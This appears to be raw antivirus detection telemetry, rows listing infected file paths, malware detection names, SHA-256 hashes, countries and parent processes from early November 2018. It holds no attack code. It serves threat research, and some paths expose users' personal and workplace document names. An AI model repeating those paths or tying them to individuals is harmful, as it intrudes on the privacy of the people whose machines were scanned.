  Row(detection=Row(filename='avscan-20181102-050632-091536a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050632-091536A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:06:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060248-e52ecbb7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060248-E52ECBB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:02:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T10:08:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052701-e539f842', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052701-E539F842', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:26:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054145-f40ce093', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054145-F40CE093', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054418-4fb9f46d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054418-4FB9F46D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050537-e7f62344', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050537-E7F62344', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='d:\\windows\\softwaredistribution\\download\\4d6e4034e4de9833cc65805f6368103f\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23471_none_78ecb91b5c330d44\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='827c6cf2bfce01f70c9770d8759f766835d2ea5e947eeae1681daaa6283dab87', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:37:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062602-24066f25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062602-24066F25', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='100canon.exe', filepath='E:\\DCIM\\100CANON.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='154543da78c93203979165fd0864dded8ff89a88f0a9be97acf3f690c8ca442b', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:47:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='industrial.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\MATERI TRAINING\\HUBUNGAN INDUSTRIAL\\INDUSTRIAL.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bad piggies.exe', filepath='F:\\Loaders\\Source\\Indie\\Bad Piggies\\Bad Piggies.exe', filesize=1280000, name='HEUR/AGEN.1000290.#M1.#R1'), hash='47be55bcb6f2f128365fb3cfb79b46ebe58e743bfb1a32a6829fd43f7f240ce3', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=4245280, timestamp='2018-11-01T12:23:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sewing,acc,gosok dll ok.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\AUDIT RPG\\AUDIT AEON\\prosedur sewing,acc,gosok dll ok\\sewing,acc,gosok dll ok.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rmldpcj.exe', filepath='C:\\$Recycle.Bin\\S-1-5-21-869931039-3699065816-470119572-1001\\$RMLDPCJ.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2755504, timestamp='2018-11-01T03:27:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T03:38:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:aYJvfBrnHVJ\\\\\\/n3hkq\\\\\\/s \\\\\\/mnl', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\installer_microsoft_excel (1).exe', parentsize=2526136, timestamp='2018-11-01T18:19:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155513-3aaf62eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155513-3AAF62EB', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160108-f5ae214a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160108-F5AE214A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T07:14:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='makan.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\DATA MASTER LPA\\CINTIA LPA\\LPA\\DATA MASTER\\GF INDONESIA\\biaya makan\\makan.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-07-08-23.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T12:18:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='foto p2k3.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO P2K3\\FOTO P2K3.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155057-8ebc9332', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155057-8EBC9332', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160343-0fafeda7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160343-0FAFEDA7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mdlup.exe', filepath='\\\\?\\C:\\eBridge\\bin\\MDLUp.EXE', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='3da2601d1a0ec4b1a1e8448a303aee446d57d02f17ca151b953ea8527f7dc342', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:32:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='folder.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\GAJI\\work new\\upah training\\New Folder\\Folder.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gps1200_vc8.dll', filepath='C:\\Program Files (x86)\\LEICA Geosystems\\GPS1200 Simulation\\Gps1200_VC8.dll', filesize=2048000, name='W32/Ramnit.CD.#M1.#R1'), hash='48e4acd39e8c939b012e29173038ea3bed25d9dcbeb4c23f053be6f1d4f3e04c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe', parentsize=1426264, timestamp='2018-11-01T09:29:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='E:\\setup.exe', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:27:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155214-9bba9db3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155214-9BBA9DB3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T19:54:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='207144232040455.exe', filepath='\\\\?\\C:\\Temp\\207144232040455.exe', filesize=192000, name='HEUR/AGEN.1031796.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='63d2b0d508caffd89e6f8fbdb6ff1ba0d3195edf16e3109531b2fa3a9da732f6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\63D2B0D508CAFFD89E6F8FBDB6FF1BA0D3195EDF16E3109531B2FA3A9DA732F6', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='63d2b0d508caffd89e6f8fbdb6ff1ba0d3195edf16e3109531b2fa3a9da732f6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:29:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='76qn6rort.vir', filepath='\\\\?\\C:\\Program Files\\76QN6RORTL\\76QN6RORT.VIR', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:48:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:25:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='caches.exe', filepath='G:\\browser\\caches.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:52:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tv.exe', filepath='C:\\Progs5\\Aldist\\TV.exe', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Progs5\\Aldist\\estoque.exe', parentsize=37241344, timestamp='2018-11-01T12:42:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nslE36C.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='-u -p 2520 -s 1532', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\WerFault.exe', parentsize=360448, timestamp='2018-11-01T05:31:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='freeyoutubetomp3converter(2).exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\FreeYouTubeToMP3Converter(2).exe', filesize=34488000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='885a5e231bfa625466aea0661ba90b13ca00a3238d9107b2bbc68da2bdaeaf49', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:58:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pcsws.exe', filepath='C:\\Program Files\\IBM\\Client Access\\Emulator\\pcsws.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c56bf9e4394213e64d50fb445064f70191378dd1f59b058d0bff581ac3c639a6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2633216, timestamp='2018-11-01T11:16:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='us.exe', filepath='E:\\driver\\dellinspiron1440driversoundxp\\Audio\\HDAQFE\\win2k_xp\\us\\us.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='617bd2bc0d2f4bc03ec5448fcfcd5a6dbfe3eb08914ed750726e0db3d00b294f', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oficio_banco_endereco.1736.09.doc', filepath='C:\\Users\\X\\Documents\\Documentos meus  -cartório justiça\\Oficio_Banco_Endereco.1736.09.doc', filesize=64000, name='HEUR/Macro.Downloader.APG.Gen.#M1.#R1'), hash='b63fc62de0e3ebee613d119c2b50e30f7adc7e50e0a45047f7f0cdb710bf27b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T22:35:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190639-00c13461', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a27c5c9\\AVSCAN-20181101-190124-CAF68D09\\AVSCAN-20181101-190639-00C13461', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:06:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141448-013d80f5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141448-013D80F5', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c069697_cip (2).exe', filepath='C:\\Users\\X\\Downloads\\C069697_CIP (2).exe', filesize=3264000, name='HEUR/AGEN.1012080.#M1.#R1'), hash='69654e61c99fc6f174639055061f6b02c6a86592d763b0170c651affd89eae0a', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T15:12:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\RESTORED\\2018-11-01_23-11-53\\setup.exe', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='64a827e67aa8f53cf7679197a41a9005bd1c4b45ba2049d4b86aba7a82998c17', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe2_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=272896, timestamp='2018-11-01T20:08:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:MiIC1l\\\\\\/jbEyNM8o0.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:34:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215915-4e814098', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c4e693d0\\AVSCAN-20181101-215241-1C39608E\\AVSCAN-20181101-215915-4E814098', filesize=788000, name='PUA/DNSBlock.#M1.#R1'), hash='6fed83ce7f539d48185dc7329823f199c509f9c04401cdfb82b83140f4bf74f6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:59:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.android.providers.media.exe', filepath='G:\\Android\\data\\com.android.providers.media.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142917-257a8382', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142917-257A8382', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:29:14Z'), dt=datetime.date(2018, 11, 1)),
